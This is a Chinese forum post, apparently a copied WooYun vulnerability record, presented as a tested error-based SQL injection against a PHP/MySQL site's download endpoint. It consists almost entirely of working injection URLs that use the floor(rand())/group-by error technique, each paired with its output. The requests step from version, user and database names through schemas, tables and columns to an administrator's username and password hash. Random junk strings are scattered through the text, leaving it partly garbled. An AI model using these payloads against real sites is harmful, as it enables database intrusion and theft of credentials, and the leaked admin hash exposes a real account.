php+mysql高级爆错注入经测算有效

admin

http://www.wooyun.org/bugs/wooyun-2010-01666

之前想找个测试 没想到这有 可以测试下做个记录而已

4 c1 s0 X* b8 K/ g2 ohttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
- C% G3 R, Z1 ?, x
/data0/htdocs/leqi_new/app/myapp.php

2 s4 V" n8 @3 \5 ^% I) S 或者

/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/ J) p% Z! M& i& |/ z* e" [/**********user()**********/  
) Y- I5 K, Q9 V3 y- E) o' {http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
3 @7 ?- u. ?1 D" Z+ ]3 p& y
/**********database()**********/  leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
6 X: ?: v& y: p8 L( s2 H
2 V2 z1 U% e' f: }) s7 `6 c/**********limit依次递归爆库**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
  [: H- F* J0 L) O, R2 q0 linformation_schema
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
5 j& L5 o, D& Z+ u( J* d) uleqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
test
) y  M9 s' ^9 q5 S3 Y# N
' ?6 Z9 |" N  `" q- H/**********limit依次递归爆表名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
9 Q  a5 Q* x" p  lusers
" k5 p) {/ }* c" I
! j: S4 o' o9 D, @. c" o* q0 A/**********limit依次递归爆字段名**********/
$ n6 `# k! Z! q4 r% l$ thttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
! N7 S' r; ?% a+ huser_id,username,nickname,passwd,group_id
) A' d* A/ u1 s: B- hhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/ a' I/ M; q1 O/wapc/5000_0005_003
11 21
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
. W# u& T5 `! `' \  X: @11 341 351 361
' ~2 Z. y! m8 \$ k$ H0 g: ^/**********爆数据**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
6a8b4574ca231eb8bd52764d4978ffcd

4 s3 V( X8 L# `! @2 W# _# r